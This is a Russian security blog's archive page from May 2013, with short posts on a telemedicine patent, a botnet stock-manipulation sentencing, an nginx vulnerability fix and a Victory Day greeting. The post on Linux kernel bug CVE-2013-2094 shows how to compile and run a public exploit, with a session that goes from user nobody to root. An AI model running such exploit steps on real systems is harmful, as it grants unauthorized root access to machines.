Архив за Май, 2013

Компания Эшелон запатентовала свою разработку в области систем телемедицины

Ваш отзыв

 

Компания НПО «Эшелон» в мае получила очередной патент на полезную модель «Защищенная система телемедицины дистанционного выявления ранних стадий заболеваний сердца».

Исследования по данной тематике были проведены под руководством доцента Горшкова Юрия Георгиевича!!!

Соавторами полезной модели, кроме Ю.Г.Горшкова, также стали А.Л.Калинкин, А.М.Каиндин, А.С.Марков и В.Л.Цирлов.

Полезная модель решает задачу дистанционного выявления ранних стадий заболеваний сердца с использованием технологии многоуровневого вейвлет-анализа.

.

Можно добавить, что указанный патент стал 15-ым по счету документом, касающимся интеллектуальной собственности талантливого коллектива организации!

 

Possibly Related Posts:


Манипуляция фондовым рынком с помощью ботнета

Ваш отзыв

marketВ марте этого года я уже высказывал опасения о возможности манипуляций на фондовом рынке с помощью ботнетов, и вот, создан прецедент.
В федеральном суде города Трентон (штат Нью-Джерси, США) закончился судебный процесс над неким Кристофером Рэдом (Christopher Rad). Этот предприимцивый американец приговорен к 71 месяцу тюремного заключения как «главный организатор подпольной организации, которая манипулировала ценами на акции с помощью ботнета, состоящего из зараженного вирусами компьютеров» Читать полностью »

Possibly Related Posts:


0day уязвимость в ядре Linux

4 комментария

encryptionВ ядре Linux найдена ранее неизвестная 0-day уязвимость CVE-2013-2094, которая позволяет получить root-доступ любому пользователю. Ошибка существует во всех ядрах, начиная с 2.6.37 до 3.8.8. В 3.8.9 версии этой уязвимости уже нет. Патч с устранением проблемы принят в состав ядра 3.8.9 в апреле. В дистрибутивах уязвимость пока остаётся неисправленной.

Эксплоит выложен в открытый доступ. Он должен срабатывать на ядрах 2.6.37 — 3.8.8, скомпилированных с опцией PERF_EVENTS (опция по умолчанию в большинстве современных дистрибутивов).

Эксплоит можно скомпилировать следующим образом:

vm$ gcc -O2 exploit.c
vm$ chmod 777 a.out
vm$ su nobody -s /bin/bash
vm$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

vm$ cd /
vm$ ls
a.out bin boot dev etc exploit.c home lib lib64 media

vm$ ./a.out
2.6.37-3.x x86_64

sh$ id
uid=0(root) gid=0(root) groups=0(root),99(nobody)

Подробное описание можно прочитать здесь

Possibly Related Posts:


Закрыта уязвимость в nginx

Ваш отзыв

nginx

Представлен внеплановый стабильный выпуск http-сервера nginx 1.4.1, а также первый выпуск новой экспериментальной ветки 1.5.0, в которых отмечается устранение уязвимости (CVE-2013-2028), которая может привести к перезаписи областей стека рабочего процесса при обработке специально оформленных chunked-запросов. При успешной эксплуатации не исключается возможность исполнения кода злоумышленника на сервере. Читать полностью »

Possibly Related Posts:


С ДНЕМ ПОБЕДЫ!!!

Ваш отзыв

С Днем Победы

Possibly Related Posts: